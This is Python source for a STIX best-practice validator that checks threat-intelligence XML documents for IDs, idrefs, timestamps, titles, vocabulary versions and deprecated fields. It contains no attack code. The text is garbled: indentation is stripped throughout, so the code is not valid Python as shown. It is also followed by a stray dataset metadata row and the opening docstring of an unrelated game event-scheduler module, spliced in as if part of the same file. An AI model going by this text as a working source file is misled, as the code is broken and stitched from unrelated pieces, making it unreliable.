ID_PATTERN = re.compile(r"[\w\-]+:\w+-.+", re.UNICODE)
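# Illustrative note: a conforming ID looks like
#   example:Indicator-b47d79f3-3022-4d09-a65b-8c3b0500d077
# ID_PATTERN.match() accepts it, while a prefix-less "Indicator-b47d..."
# fails because no ':' separates a namespace prefix from the construct type.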
def rule(minver, maxver=None):
"""Decorator that identifies methods as being a STIX best practice checking
rule.
    Args:
        minver: Identifies the minimum version of STIX for which the
            decorated method applies.
        maxver: Identifies the maximum version of STIX for which the
            decorated method applies (``None`` means no upper bound).
"""
def decorator(func):
func.is_rule = True
func.min_version = minver
func.max_version = maxver
return func
return decorator
class BestPracticeMeta(type):
"""Metaclass that collects all :meth:`rule` decorated methods and
builds an internal mapping of STIX version numbers to rules.
"""
def __new__(metacls, name, bases, dict_):
obj = type.__new__(metacls, name, bases, dict_)
# Initialize a mapping of STIX versions to applicable rule funcs.
ruledict = collections.defaultdict(list)
# Find all @rule marked functions in the class dict_
rulefuncs = (x for x in itervalues(dict_) if hasattr(x, 'is_rule'))
# Build the rule function dict.
for rule in rulefuncs:
ruledict[(rule.min_version, rule.max_version)].append(rule) # noqa
# Attach the rule dictionary to the object instance.
obj._rules = ruledict # noqa
return obj
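# Illustrative sketch: together with @rule, the metaclass gives each subclass
# a version-keyed registry of its checking methods. The class below is
# hypothetical:
#
#     class MyValidator(with_metaclass(BestPracticeMeta, object)):
#         @rule('1.0')
#         def _check_example(self, root, namespaces, version):
#             return BestPracticeWarningCollection('Example')
#
#     # MyValidator._rules[('1.0', None)] -> [<function _check_example>]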
class BestPracticeWarning(compat.MutableMapping, base.ValidationError):
"""Represents a best practice warning. These are built within best
practice rule checking methods and attached to
:class:`BestPracticeWarningCollection` instances.
Note:
This class acts like a dictionary and contains the following keys
at a minimum:
* ``'id'``: The id of a node associated with the warning.
* ``'idref'``: The idref of a node associated with the warning.
* ``'line'``: The line number of the offending node.
* ``'message'``: A message associated with the warning.
* ``'tag'``: The lxml tag for the offending node.
These keys can be retrieved via the :attr:`core_keys` property.
Instances of this class may attach additional keys. These `other keys`
can be obtained via the :attr:`other_keys` property.
Args:
node: The ``lxml._Element`` node associated with this warning.
message: A message for this warning.
"""
def __init__(self, node, message=None):
base.ValidationError.__init__(self)
self._inner = OrderedDict()
self._node = node
self['line'] = node.sourceline
self['message'] = message
self['id'] = node.attrib.get('id')
self['idref'] = node.attrib.get('idref')
self['tag'] = node.tag
def __unicode__(self):
return unicode(self.message)
def __str__(self):
return unicode(self).encode("utf-8")
def __getitem__(self, key):
return self._inner.__getitem__(key)
def __delitem__(self, key):
self._inner.__delitem__(key)
def __setitem__(self, key, value):
self._inner.__setitem__(key, value)
def __len__(self):
return self._inner.__len__()
def __iter__(self):
return self._inner.__iter__()
@property
def line(self):
"""Returns the line number of the warning node in the input document.
"""
return self['line']
@property
def message(self):
"""Returns a message associated with the warning. This may return
``None`` if there is no warning message.
"""
return self['message']
@property
def core_keys(self):
"""Returns a ``tuple`` of the keys that can always be found on
instance of this class.
Returns:
A tuple including the following keys.
* ``'id'``: The id of the warning node. The associated value
may be ``None``.
* ``'idref'``: The idref of the warning node. The associated value
may be ``None``.
* ``'line'``: The line number of the warning node in the input
document. The associated value may be ``None``.
* ``'tag'``: The ``{namespace}localname`` value of the warning
node.
* ``'message'``: An optional message that can be attached to the
warning. The associated value may be ``None``.
"""
return ('id', 'idref', 'line', 'tag', 'message')
@property
def other_keys(self):
"""Returns a ``tuple`` of keys attached to instances of this class that
are not found in the :attr:`core_keys`.
"""
return tuple(x for x in self if x not in self.core_keys)
def as_dict(self):
"""Returns a dictionary representation of this class instance. This
is implemented for consistency across other validation error types.
The :class:`.BestPracticeWarning` class extends
:class:`collections.MutableMapping`, so this method isn't really
necessary.
"""
return dict(iteritems(self))
class BestPracticeWarningCollection(compat.MutableSequence):
"""A collection of :class:`BestPracticeWarning` instances for a given
type of STIX Best Practice.
For example, all warnings about STIX constructs missing titles would
go within an instance of this class.
Note:
This class behaves like a mutable sequence, such as a ``list``.
Args:
name: The name of the STIX best practice for this collection (e.g.,
'Missing Titles').
Attributes:
name: The name of the STIX best practice for this collection (e.g.,
'Missing Titles').
"""
def __init__(self, name):
super(BestPracticeWarningCollection, self).__init__()
self.name = name
self._warnings = []
def insert(self, idx, value):
"""Inserts `value` at `idx` into this
:class:`BestPracticeWarningCollection` instance.
Note:
Values that evaluate to ``False`` will not be inserted.
"""
if not value:
return
if isinstance(value, etree._Element): # noqa
value = BestPracticeWarning(node=value)
self._warnings.insert(idx, value)
def __getitem__(self, key):
return self._warnings.__getitem__(key)
def __setitem__(self, key, value):
self._warnings.__setitem__(key, value)
def __delitem__(self, key):
self._warnings.__delitem__(key)
def __len__(self):
return len(self._warnings)
def __nonzero__(self):
return bool(self._warnings)
def as_dict(self):
"""Returns a dictionary representation.
The key of the dictionary is the ``name`` of this collection. The
associated value is a ``list`` of :class:`BestPracticeWarning`
dictionaries.
"""
if not self:
return {}
return {self.name: [x.as_dict() for x in self]}
class BestPracticeValidationResults(base.ValidationResults, compat.MutableSequence):
"""Represents STIX best practice validation results. This class behaves
like a ``list`` and accepts instances of
:class:`BestPracticeWarningCollection`.
"""
def __init__(self):
base.ValidationResults.__init__(self, False)
self._warnings = []
@base.ValidationResults.is_valid.getter
def is_valid(self):
"""Returns ``True`` if an instance of this class contains no warning
collections or only contains only warning collections.
"""
return not(any(self))
@property
def errors(self):
"""Returns a ``list`` of :class:`BestPracticeWarningCollection`
instances.
"""
return [x for x in self if x]
def insert(self, idx, value):
"""Inserts an instance of :class:`BestPracticeWarningCollection`.
Note:
If ``bool(value) == False`` then `value` will not be inserted.
Raises:
ValueError: If `value` is not an instance of
:class:`BestPracticeWarningCollection`.
"""
if not value:
return
if not isinstance(value, BestPracticeWarningCollection):
raise ValueError(
"Value must be instance of BestPracticeWarningCollection"
)
self._warnings.insert(idx, value)
def __getitem__(self, key):
return self._warnings.__getitem__(key)
def __setitem__(self, key, value):
self._warnings.__setitem__(key, value)
def __delitem__(self, key):
self._warnings.__delitem__(key)
def __len__(self):
return len(self._warnings)
def __nonzero__(self):
return bool(self._warnings)
def as_dict(self):
"""Returns a dictionary representation.
Keys:
* ``'result'``: The result of the validation. Values can be
``True`` or ``False`` .
* ``'errors'``: A list of :class:`BestPracticeWarningCollection`
dictionaries.
"""
d = base.ValidationResults.as_dict(self)
if any(self):
d['errors'] = [x.as_dict() for x in self if x]
return d
class STIXBestPracticeValidator(with_metaclass(BestPracticeMeta, object)):
"""Performs STIX Best Practice validation."""
@rule('1.0')
def _check_id_presence(self, root, namespaces, version): # noqa
"""Checks that all major STIX/CybOX constructs have id attributes set.
Constructs with idref attributes set should not have an id attribute
and are thus omitted from the results.
"""
to_check = itertools.chain(
common.STIX_CORE_COMPONENTS,
common.CYBOX_CORE_COMPONENTS
)
results = BestPracticeWarningCollection('Missing IDs')
xpath = " | ".join("//%s" % x for x in to_check)
nodes = root.xpath(xpath, namespaces=namespaces)
for node in nodes:
if any(x in node.attrib for x in ('id', 'idref')):
continue
warning = BestPracticeWarning(node=node)
results.append(warning)
return results
@rule('1.0')
def _check_id_format(self, root, namespaces, version): # noqa
"""Checks that the core STIX/CybOX constructs in the STIX instance
document have ids and that each id is a valid QName, formatted as
follows:
``[ns_prefix]:[object-type]-[GUID].``
Note:
This only checks for STIX ID best practices and does not verify
that the ID is a valid QName. QName conformance verification is
done during XML Schema validation.
"""
to_check = itertools.chain(
common.STIX_CORE_COMPONENTS,
common.CYBOX_CORE_COMPONENTS
)
results = BestPracticeWarningCollection('ID Format')
msg = "ID should be formatted as [ns prefix]:[construct type]-[GUID]"
xpath = " | ".join("//%s[@id]" % x for x in to_check)
for node in root.xpath(xpath, namespaces=namespaces):
id_ = node.attrib['id']
if ID_PATTERN.match(id_):
continue
result = BestPracticeWarning(node=node, message=msg)
results.append(result)
return results
def _get_id_timestamp_conflicts(self, nodes):
"""Returns a list of BestPracticeWarnings for all nodes in `nodes`
that have duplicate (id, timestamp) pairs.
"""
warns = []
def _equal_timestamps(nodeset):
return [x for x in nodeset if utils.is_equal_timestamp(node, x)]
while len(nodes) > 1:
node = nodes.pop()
ts_equal = _equal_timestamps(nodes)
if not ts_equal:
continue
conflicts = itertools.chain(ts_equal, (node,))
for c in conflicts:
warning = BestPracticeWarning(node=c)
warning['timestamp'] = c.attrib.get('timestamp')
warns.append(warning)
utils.remove_all(nodes, ts_equal)
return warns
@rule('1.2')
def _check_1_2_duplicate_ids(self, root, namespaces, version): # noqa
"""STIX 1.2 dropped the schematic enforcement of id uniqueness to
support versioning of components.
This checks for duplicate (id, timestamp) pairs.
"""
results = BestPracticeWarningCollection('Duplicate IDs')
nlist = namespaces.values()
# Find all nodes with IDs in the STIX/CybOX namespace
nodes = root.xpath("//*[@id]")
filtered = [x for x in nodes if utils.namespace(x) in nlist]
# Build a mapping of IDs to nodes
idnodes = collections.defaultdict(list)
for node in filtered:
idnodes[node.attrib.get('id')].append(node)
# Find all nodes that have duplicate IDs
dups = [x for x in itervalues(idnodes) if len(x) > 1]
# Build warnings for all nodes that have conflicting id/timestamp pairs.
for nodeset in dups:
warns = self._get_id_timestamp_conflicts(nodeset)
results.extend(warns)
return results
@rule(minver='1.0', maxver='1.1.1')
def _check_1_0_duplicate_ids(self, root, namespaces, version): # noqa
"""Checks for duplicate ids in the document.
"""
id_nodes = collections.defaultdict(list)
for node in root.xpath("//*[@id]"):
id_nodes[node.attrib['id']].append(node)
results = BestPracticeWarningCollection('Duplicate IDs')
for nodes in itervalues(id_nodes):
if len(nodes) > 1:
results.extend(BestPracticeWarning(node=x) for x in nodes)
return results
@rule('1.0')
def _check_idref_resolution(self, root, namespaces, version): # noqa
"""Checks that all idrefs resolve to a construct in the document.
"""
idrefs = root.xpath("//*[@idref]")
ids = root.xpath("//@id")
def idref(x):
return x.attrib['idref']
results = BestPracticeWarningCollection("Unresolved IDREFs")
warns = (BestPracticeWarning(x) for x in idrefs if idref(x) not in ids)
results.extend(warns)
return results
@rule('1.0')
def _check_idref_with_content(self, root, namespaces, version): # noqa
"""Checks that constructs with idref set do not contain content.
Note:
Some STIX/CybOX constructs (e.g., ``Related_Object`` instances) are
exceptions to this rule.
"""
def is_invalid(node):
if common.is_idref_content_exception(node):
return False
return utils.has_content(node)
nodes = root.xpath("//*[@idref]")
warnings = (BestPracticeWarning(x) for x in nodes if is_invalid(x))
results = BestPracticeWarningCollection("IDREF with Content")
results.extend(warnings)
return results
@rule('1.0')
def _check_indicator_practices(self, root, namespaces, version): # noqa
"""Looks for STIX Indicators that are missing a Description, Type,
Valid_Time_Position, Indicated_TTP, and/or Confidence.
"""
to_check = (
"{0}:Indicator".format(common.PREFIX_STIX_CORE),
"{0}:Indicator".format(common.PREFIX_STIX_COMMON),
"{0}:Indicator".format(common.PREFIX_STIX_REPORT),
)
results = BestPracticeWarningCollection("Indicator Suggestions")
xpath = " | ".join("//%s" % x for x in to_check)
ns = namespaces[common.PREFIX_STIX_INDICATOR]
for indicator in root.xpath(xpath, namespaces=namespaces):
missing = []
if 'idref' not in indicator.attrib:
if indicator.find('{%s}Description' % ns) is None:
missing.append("Description")
if indicator.find('{%s}Type' % ns) is None:
missing.append("Type")
if indicator.find('{%s}Valid_Time_Position' % ns) is None:
missing.append('Valid_Time_Position')
if indicator.find('{%s}Indicated_TTP' % ns) is None:
missing.append('Indicated_TTP')
if indicator.find('{%s}Confidence' % ns) is None:
missing.append('Confidence')
if missing:
warning = BestPracticeWarning(node=indicator)
warning['missing'] = missing
results.append(warning)
return results
@rule('1.0')
def _check_root_element(self, root, namespaces, version): # noqa
"""Checks that the root element is a STIX_Package.
"""
ns = namespaces[common.PREFIX_STIX_CORE]
results = BestPracticeWarningCollection("Root Element")
if root.tag != "{%s}STIX_Package" % (ns):
warning = BestPracticeWarning(node=root)
results.append(warning)
return results
@rule('1.0')
def _check_latest_vocabs(self, root, namespaces, version): # noqa
"""Checks that all STIX vocabs are using latest published versions.
Triggers a warning if an out of date vocabulary is used.
Note:
The xpath used to discover instances of controlled vocabularies
assumes that the type name ends with 'Vocab-'. An example
instance would be 'IndicatorTypeVocab-1.0'.
"""
results = BestPracticeWarningCollection("Vocab Suggestions")
xpath = "//*[contains(@xsi:type, 'Vocab-')]"
for vocab in root.xpath(xpath, namespaces=namespaces):
xsi_type = vocab.attrib[xmlconst.TAG_XSI_TYPE]
name = common.parse_vocab_name(xsi_type)
found = common.parse_vocab_version(xsi_type)
expected = common.get_vocab_version(root, version, xsi_type)
if found == expected:
continue
warning = BestPracticeWarning(node=vocab)
warning['vocab name'] = name
warning['version found'] = found
warning['version expected'] = expected
results.append(warning)
return results
@rule('1.0')
def _check_latest_versions(self, root, namespaces, version): # noqa
"""Checks that all major STIX constructs versions are equal to
the latest version.
"""
to_check = common.STIX_COMPONENT_VERSIONS[version]
results = BestPracticeWarningCollection('Latest Component Versions')
def _is_expected(node, expected):
if 'version' not in node.attrib:
return True
return node.attrib['version'] == expected
for selector, expected in iteritems(to_check):
xpath = "//%s" % selector
for node in root.xpath(xpath, namespaces=namespaces):
if _is_expected(node, expected):
continue
warning = BestPracticeWarning(node)
warning['version found'] = node.attrib['version']
warning['version expected'] = expected
results.append(warning)
return results
def _check_timestamp_usage(self, root, namespaces, selectors):
"""Inspects each node in `nodes` for correct timestamp use.
"""
results = BestPracticeWarningCollection("Timestamp Use")
xpath = " | ".join("//%s" % x for x in selectors)
nodes = root.xpath(xpath, namespaces=namespaces)
for node in nodes:
attrib = node.attrib.get
id_ = attrib('id')
idref = attrib('idref')
timestamp = attrib('timestamp')
if timestamp:
tz_set = utils.has_tzinfo(timestamp)
if not tz_set:
warning = BestPracticeWarning(
                        node=node,
message="Timestamp without timezone information."
)
warning['timestamp'] = timestamp
results.append(warning)
if id_ and not timestamp:
warning = BestPracticeWarning(
node=node,
message="ID present but missing timestamp"
)
elif idref and not timestamp:
warning = BestPracticeWarning(
node=node,
message="IDREF present but missing timestamp"
)
elif idref and timestamp:
resolves = common.idref_timestamp_resolves(
root=root,
idref=idref,
timestamp=timestamp,
namespaces=namespaces
)
if resolves:
continue
warning = BestPracticeWarning(
node=node,
message="IDREF and timestamp combination do not resolve "
"to a node in the input document."
)
warning['timestamp'] = timestamp
else:
continue
results.append(warning)
return results
@rule(minver='1.1', maxver='1.1.1')
def _check_1_1_timestamp_usage(self, root, namespaces, **kwargs): # noqa
"""Checks that all major STIX constructs have appropriate
timestamp usage.
Note:
This does not check core CybOX constructs because they lack
timestamp attributes.
"""
to_check = common.STIX_CORE_COMPONENTS
results = self._check_timestamp_usage(root, namespaces, to_check)
return results
@rule('1.2')
def _check_1_2_timestamp_usage(self, root, namespaces, **kwargs): # noqa
"""Checks that all major STIX constructs have appropriate
timestamp usage.
Note:
This does not check core CybOX constructs because they lack
timestamp attributes.
"""
to_check = common.STIX_CORE_COMPONENTS[2:] # skip STIX Packages
results = self._check_timestamp_usage(root, namespaces, to_check)
return results
def _check_titles(self, root, namespaces, selectors):
"""Checks that each node in `nodes` has a ``Title`` element unless
there is an ``@idref`` attribute set.
"""
results = BestPracticeWarningCollection("Missing Titles")
xpath = " | ".join("//%s" % x for x in selectors)
nodes = root.xpath(xpath, namespaces=namespaces)
for node in nodes:
if 'idref' in node.attrib:
continue
if not any(utils.localname(x) == 'Title' for x in utils.iterchildren(node)):
warning = BestPracticeWarning(node=node)
results.append(warning)
return results
@rule(minver='1.0', maxver='1.1.1')
def _check_1_0_titles(self, root, namespaces, version): # noqa
"""Checks that all major STIX constructs have a Title element.
"""
to_check = (
'{0}:STIX_Package/{0}:STIX_Header'.format(common.PREFIX_STIX_CORE),
'{0}:Campaign'.format(common.PREFIX_STIX_CORE),
'{0}:Campaign'.format(common.PREFIX_STIX_COMMON),
'{0}:Course_Of_Action'.format(common.PREFIX_STIX_CORE),
'{0}:Course_Of_Action'.format(common.PREFIX_STIX_COMMON),
'{0}:Exploit_Target'.format(common.PREFIX_STIX_CORE),
'{0}:Exploit_Target'.format(common.PREFIX_STIX_COMMON),
'{0}:Incident'.format(common.PREFIX_STIX_CORE),
'{0}:Incident'.format(common.PREFIX_STIX_COMMON),
'{0}:Indicator'.format(common.PREFIX_STIX_CORE),
'{0}:Indicator'.format(common.PREFIX_STIX_COMMON),
'{0}:Threat_Actor'.format(common.PREFIX_STIX_COMMON),
'{0}:Threat_Actor'.format(common.PREFIX_STIX_CORE),
'{0}:TTP'.format(common.PREFIX_STIX_CORE),
'{0}:TTP'.format(common.PREFIX_STIX_COMMON)
)
results = self._check_titles(root, namespaces, to_check)
return results
@rule('1.2')
def _check_1_2_titles(self, root, namespaces, version): # noqa
"""Checks that all major STIX constructs have a Title element.
"""
to_check = (
'{0}:Campaign'.format(common.PREFIX_STIX_CORE),
'{0}:Campaign'.format(common.PREFIX_STIX_COMMON),
'{0}:Course_Of_Action'.format(common.PREFIX_STIX_CORE),
'{0}:Course_Of_Action'.format(common.PREFIX_STIX_COMMON),
'{0}:Exploit_Target'.format(common.PREFIX_STIX_CORE),
'{0}:Exploit_Target'.format(common.PREFIX_STIX_COMMON),
'{0}:Incident'.format(common.PREFIX_STIX_CORE),
'{0}:Incident'.format(common.PREFIX_STIX_COMMON),
'{0}:Indicator'.format(common.PREFIX_STIX_CORE),
'{0}:Indicator'.format(common.PREFIX_STIX_COMMON),
'{0}:Threat_Actor'.format(common.PREFIX_STIX_COMMON),
'{0}:Threat_Actor'.format(common.PREFIX_STIX_CORE),
'{0}:TTP'.format(common.PREFIX_STIX_CORE),
'{0}:TTP'.format(common.PREFIX_STIX_COMMON),
'{0}:Report/{1}:Header'.format(common.PREFIX_STIX_CORE, common.PREFIX_STIX_REPORT),
'{0}:Report/{1}:Header'.format(common.PREFIX_STIX_COMMON, common.PREFIX_STIX_REPORT)
)
results = self._check_titles(root, namespaces, to_check)
return results
@rule('1.0')
def _check_marking_control_xpath(self, root, namespaces, version): # noqa
"""Checks that data marking controlled structure XPaths are valid
and resolve to nodes in the `root` document.
"""
results = BestPracticeWarningCollection("Data Marking Control XPath")
xpath = "//%s:Controlled_Structure" % common.PREFIX_DATA_MARKING
for elem in root.xpath(xpath, namespaces=namespaces):
if not elem.text:
message = "Empty Control XPath"
else:
message = common.test_xpath(elem)
if message:
result = BestPracticeWarning(node=elem, message=message)
results.append(result)
return results
@rule('1.0')
def _check_condition_attribute(self, root, namespaces, version): # noqa
"""Checks that Observable properties contain a ``@condition``
attribute.
This will also attempt to resolve Observables which are referenced
(not embedded) within Indicators.
Note:
This could produce inaccurate results if a CybOX ObjectProperties
instance contains fields that do not contain a ``condition``
attribute (e.g., a field that is not patternable).
"""
results = BestPracticeWarningCollection(
"Indicator Pattern Properties Missing Condition Attributes"
)
selectors = (
"//{0}:Indicator".format(common.PREFIX_STIX_CORE),
"//{0}:Indicator".format(common.PREFIX_STIX_COMMON),
"//{0}:Indicator".format(common.PREFIX_STIX_REPORT)
)
xpath = " | ".join(selectors)
indicators = root.xpath(xpath, namespaces=namespaces)
if len(indicators) == 0:
return results
def _get_leaves(nodes):
"""Finds and returns all leaf nodes contained within `nodes`."""
leaves = []
for n in nodes:
leaves.extend(x for x in utils.leaves(n) if utils.has_content(x))
return leaves
def _get_observables(indicators):
"""Iterates over `indicators` and yields an (indicator instance,
observable list) tuple with each pass.
The observable list contains all observable instances embedded or
referenced within the Indicator.
"""
for indicator in indicators:
observables = common.get_indicator_observables(
root=root,
indicator=indicator,
namespaces=namespaces
)
yield (indicator, observables)
xpath = ".//{0}:Properties".format(common.PREFIX_CYBOX_CORE)
for indicator, observables in _get_observables(indicators):
id_ = indicator.attrib.get('id', 'No ID Found')
for obs in observables:
props = obs.xpath(xpath, namespaces=namespaces)
for leaf in _get_leaves(props):
if leaf.attrib.get('condition'):
continue
result = BestPracticeWarning(leaf)
result['parent indicator id'] = id_
result['parent indicator line'] = indicator.sourceline
results.append(result)
return results
@rule('1.0')
def _check_example_namespace(self, root, namespaces, version): # noqa
"""Checks for nodes in the input `root` document that contain IDs
which fall under the ``example`` namespace.
"""
ex_namespaces = ('http://example.com', 'http://example.com/')
# Get all the namespaces used in the document
doc_nsmap = utils.get_document_namespaces(root)
# Element tags to check for example ID presence
to_check = itertools.chain(
common.STIX_CORE_COMPONENTS,
common.CYBOX_CORE_COMPONENTS
)
results = BestPracticeWarningCollection('IDs Use Example Namespace')
xpath = " | ".join("//%s" % x for x in to_check)
for node in root.xpath(xpath, namespaces=namespaces):
if 'id' not in node.attrib:
continue
# ID attr found. Break it up into ns prefix and local parts
id_parts = node.attrib['id'].split(":")
if len(id_parts) != 2:
continue
# Try to get the namespace mapped to the ID ns prefix
prefix = id_parts[0]
ns = doc_nsmap.get(prefix)
if ns not in ex_namespaces:
continue
result = BestPracticeWarning(node=node)
results.append(result)
return results
def _get_1_2_tlo_deprecations(self, root, namespaces):
"""Checks for the existence of any idref elements inside the STIX
Package top-level collections.
"""
stix = (
'//{0}:Campaigns/{0}:Campaign',
'//{0}:Courses_Of_Action/{0}:Course_Of_Action',
'//{0}:Exploit_Targets/{0}:Exploit_Target',
'//{0}:Incidents/{0}:Incident',
'//{0}:Indicators/{0}:Indicator',
'//{0}:Threat_Actors/{0}:Threat_Actor',
'//{0}:TTPs/{0}:TTP',
'//{0}:Related_Packages/{0}:Related_Package/{0}:Package',
)
cybox = "//{0}:Observables/{1}:Observable".format(
common.PREFIX_STIX_CORE,
common.PREFIX_CYBOX_CORE
)
# Combine the STIX and CybOX selectors
to_check = [x.format(common.PREFIX_STIX_CORE) for x in stix]
to_check.append(cybox)
xpath = " | ".join(to_check)
nodes = root.xpath(xpath, namespaces=namespaces)
# Create result collection
msg = "IDREFs in top-level collections is deprecated."
# Attach warnings to collection
warns = []
for node in nodes:
if 'idref' not in node.attrib:
continue
warn = BestPracticeWarning(node=node, message=msg)
warns.append(warn)
return warns
def _get_1_2_related_package_deprecations(self, root, namespaces):
"""Checks for deprecated use of Related_Packages in STIX component
instances.
"""
selector = "//{0}:Related_Packages"
prefixes = (
common.PREFIX_STIX_CAMPAIGN,
common.PREFIX_STIX_COA,
common.PREFIX_STIX_EXPLOIT_TARGET,
common.PREFIX_STIX_INCIDENT,
common.PREFIX_STIX_INDICATOR,
common.PREFIX_STIX_THREAT_ACTOR,
common.PREFIX_STIX_TTP
)
to_check = (selector.format(prefix) for prefix in prefixes)
xpath = " | ".join(to_check)
nodes = root.xpath(xpath, namespaces=namespaces)
msg = "Use of Related_Packages is deprecated."
warns = [BestPracticeWarning(node=x, message=msg) for x in nodes]
return warns
def _get_1_2_package_deprecations(self, root, namespaces):
"""Checks for deprecated fields on STIX Package instances.
"""
to_check = (
"//{0}:STIX_Package".format(common.PREFIX_STIX_CORE),
"//{0}:Package".format(common.PREFIX_STIX_CORE)
)
xpath = " | ".join(to_check)
nodes = root.xpath(xpath, namespaces=namespaces)
warns = []
for node in nodes:
attrib = node.attrib
if 'idref' in attrib:
msg = "@idref is deprecated in STIX Package."
warn = BestPracticeWarning(node=node, message=msg)
warns.append(warn)
if 'timestamp' in attrib:
msg = "@timestamp is deprecated in STIX Package."
warn = BestPracticeWarning(node=node, message=msg)
warns.append(warn)
return warns
def _get_1_2_header_warnings(self, root, namespaces):
"""Checks for deprecated fields on STIX Header instances.
"""
to_check = (
"{0}:Title".format(common.PREFIX_STIX_CORE),
"{0}:Description".format(common.PREFIX_STIX_CORE),
"{0}:Short_Description".format(common.PREFIX_STIX_CORE),
"{0}:Package_Intent".format(common.PREFIX_STIX_CORE),
)
header = "//{0}:STIX_Header".format(common.PREFIX_STIX_CORE)
xpath = " | ".join("%s/%s" % (header, x) for x in to_check)
nodes = root.xpath(xpath, namespaces=namespaces)
fmt = "%s is deprecated in STIX Header."
warns = []
for node in nodes:
localname = utils.localname(node)
msg = fmt % localname
warn = BestPracticeWarning(node=node, message=msg)
warns.append(warn)
return warns
@rule('1.2')
def _check_1_2_deprecations(self, root, namespaces, version): # noqa
"""Checks the input document `root` for fields that were deprecated
in STIX v1.2.
"""
package_warnings = self._get_1_2_package_deprecations(
root=root,
namespaces=namespaces
)
header_warnings = self._get_1_2_header_warnings(
root=root,
namespaces=namespaces
)
tlo_warnings = self._get_1_2_tlo_deprecations(
root=root,
namespaces=namespaces
)
        related_package_warnings = self._get_1_2_related_package_deprecations(
root=root,
namespaces=namespaces
)
warns = itertools.chain(
package_warnings,
header_warnings,
tlo_warnings,
related_package_warnings
)
results = BestPracticeWarningCollection("STIX 1.2 Deprecations")
results.extend(warns)
return results
def _get_campaign_related_indicators(self, root, namespaces):
xpath = ".//{0}:Related_Indicators".format(common.PREFIX_STIX_CAMPAIGN)
nodes = root.xpath(xpath, namespaces=namespaces)
msg = "Related_Indicators has been deprecated in Campaign."
return [BestPracticeWarning(node=n, message=msg) for n in nodes]
@rule('1.1')
def _check_1_1_deprecations(self, root, namespaces, version): # noqa
"""Checks the input document `root` for fields that were deprecated
in STIX v1.1.
"""
results = BestPracticeWarningCollection("STIX 1.1 Deprecations")
warns = self._get_campaign_related_indicators(root, namespaces)
results.extend(warns)
return results
def _get_bad_ordinalities(self, nodes, tag, namespaces):
"""Returns a set of warnings for nodes in `nodes` that do not comply
with @ordinality use of descriptive elements.
Args:
nodes: A set of nodes that have more than one instance of `tag`
children.
tag: The localname of the nodes to inspect for ordinalities.
namespaces: A list of STIX namespaces.
"""
def can_inspect(node):
"""Only check nodes that are in the STIX namespace and have a
localname that matches the tag (e.g., 'Description').
"""
qname = etree.QName(node)
return (qname.localname == tag) and (qname.namespace in namespaces)
filtered = []
for node in nodes:
# Filter out fields that belong to non-STIX namespaces
filtered.extend(x for x in utils.iterchildren(node) if can_inspect(x))
warns = []
seen = set()
for node in filtered:
o = node.attrib.get('ordinality')
if o is None:
fmt = "@ordinality missing in '{0}' list."
msg = fmt.format(tag)
warns.append(BestPracticeWarning(node=node, message=msg))
continue
o = int(o) # @ordinality is a xs:positiveInteger type.
if o in seen:
fmt = "@ordinality is duplicate in '{0}' list: '{1}'"
msg = fmt.format(tag, o)
warns.append(BestPracticeWarning(node=node, message=msg))
continue
seen.add(o)
return warns
@rule('1.2')
def _check_structured_text_ordinalities(self, root, namespaces, version): # noqa
"""Checks the input STIX document for correct ordinality usage in
StructuredText lists.
Checks for duplicates and missing ordinality attributes in elements
that have lists of StructuredText instances.
"""
# Selects nodes that have more than one instance of a specific
# StructuredTextType child (i.e., more than one Description child).
xpath_fmt = "//*[count(child::*[local-name()='{0}']) > 1]"
tags = (
"Description",
"Short_Description",
"Description_Of_Effect",
"Business_Function_Or_Role"
)
title = "StructuredText @ordinality Use"
results = BestPracticeWarningCollection(title)
nslist = namespaces.values()
for tag in tags:
xpath = xpath_fmt.format(tag)
nodes = root.xpath(xpath, namespaces=namespaces)
if len(nodes) == 0:
continue
warns = self._get_bad_ordinalities(nodes, tag, nslist)
results.extend(warns)
return results
def _get_rules(self, version):
"""Returns a list of best practice check functions that are applicable
to the STIX `version`.
"""
def can_run(stix_version, rule_min, rule_max):
if not rule_min:
return True
doc_ver = StrictVersion(remove_version_prefix(stix_version))
min_ver = StrictVersion(remove_version_prefix(rule_min))
if rule_max:
max_ver = StrictVersion(remove_version_prefix(rule_max))
return (min_ver <= doc_ver <= max_ver)
return min_ver <= doc_ver
StrictVersion = distutils.version.StrictVersion
all_rules = iteritems(self._rules) # noqa
# Get a generator which yields all best practice methods that are
# assigned a version number <= the input STIX document version number.
rules = []
for (versions, funcs) in all_rules:
min_, max_ = versions
rules.extend(f for f in funcs if can_run(version, min_, max_))
return rules
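    # Note (added for clarity): a rule declared with only a minimum version,
    # e.g. @rule('1.0'), runs against any document version >= 1.0, while
    # @rule(minver='1.1', maxver='1.1.1') runs only for versions in the
    # inclusive range [1.1, 1.1.1].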
def _run_rules(self, root, version):
"""Runs all best practice rules applicable to a `version` of STIX
against the `root` document.
"""
namespaces = common.get_stix_namespaces(version)
results = BestPracticeValidationResults()
rules = self._get_rules(version)
for func in rules:
result = func(self, root, namespaces=namespaces, version=version)
results.append(result)
return results
@common.check_stix
def validate(self, doc, version=None):
"""Checks that a STIX document aligns with `suggested authoring
practices`_.
.. _suggested authoring practices: http://stixproject.github.io/documentation/suggested-practices/
Args:
doc: The STIX document. Can be a filename, file-like object,
lxml._Element, or lxml._ElementTree instance.
version: The version of the STIX document. This will determine the
set of best practice rules to check. If ``None`` an attempt
will be made to extract the version from `doc`.
Returns:
An instance of
:class:`.BestPracticeValidationResults`.
Raises:
.UnknownSTIXVersionError: If `version` was ``None`` and `doc`
did not contain any version information.
.InvalidSTIXVersionError: If discovered version or `version`
argument contains an invalid STIX version number.
.ValidationError: If there are any issues parsing `doc`.
"""
# Get the element for the input document
root = utils.get_etree_root(doc)
# Get the STIX version for the input `doc` if one is not passed in.
version = version or common.get_version(root)
# Check that the version number is a valid STIX version number
common.check_version(version)
# Run the best practice checks applicable for the STIX version number.
results = self._run_rules(root, version)
# Return the results
return results
__all__ = [
'STIXBestPracticeValidator',
'BestPracticeValidationResults',
'BestPracticeWarningCollection',
'BestPracticeWarning'
]
|
bsd-3-clause
| 6,831,026,196,110,730,000
| 32.578577
| 106
| 0.583719
| false
| 4.224988
| false
| false
| false
|
Anstow/TeamAwesome
|
game/ext/sched.py
|
1
|
23655
|
"""Event scheduler by Joseph Lansdowne.
Uses Pygame's wait function if available, else the less accurate time.sleep.
To use something else, do:
import sched
sched.wait = wait_function
This function should take the number of milliseconds to wait for. This will
always be an integer.
Python version: 2.
Release: 11-dev.
Licensed under the GNU General Public License, version 3; if this was not
included, you can find it here:
http://www.gnu.org/licenses/gpl-3.0.txt
CLASSES
Timer
Scheduler
FUNCTIONS
interp_linear
interp_target
interp_round
interp_repeat
